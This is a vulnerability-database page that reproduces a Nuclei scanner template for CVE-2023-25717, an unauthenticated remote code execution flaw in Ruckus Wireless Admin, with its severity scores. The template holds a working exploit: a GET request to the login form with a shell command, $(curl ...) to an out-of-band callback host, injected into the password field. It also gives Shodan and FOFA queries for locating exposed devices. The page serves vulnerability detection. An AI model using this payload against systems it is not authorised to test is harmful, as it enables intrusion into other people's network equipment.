Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-25717
HistoryMay 09, 2023 - 12:35 p.m.

Ruckus Wireless Admin - Remote Code Execution

2023-05-0912:35:28
ProjectDiscovery
github.com
23

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.958 High

EPSS

Percentile

99.4%

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
id: CVE-2023-25717

info:
  name: Ruckus Wireless Admin - Remote Code Execution
  author: parthmalhotra,pdresearch
  severity: critical
  description: |
    Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
  impact: |
    Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
  remediation: |
    Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
  reference:
    - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
    - https://support.ruckuswireless.com/security_bulletins/315
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25717
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25717
    cwe-id: CWE-94
    epss-score: 0.95613
    epss-percentile: 0.99262
    cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ruckuswireless
    product: ruckus_wireless_admin
    shodan-query: title:"ruckus wireless"
    fofa-query: title="ruckus wireless"
  tags: cve2023,cve,ruckus,rce,kev,ruckuswireless

http:
  - method: GET
    path:
      - "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), 'user-agent','curl')
          - status_code_1 == 302
        condition: and
# digest: 4a0a0047304502200deafea4ba54747e5bf0550af972b71e8b94a3fb9846f463fd3084ad5465d5f9022100fcafaf89869758bc5c5e6f633b28dbdfbb2c9cecdd09bf18269b8681b083b713:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.958 High

EPSS

Percentile

99.4%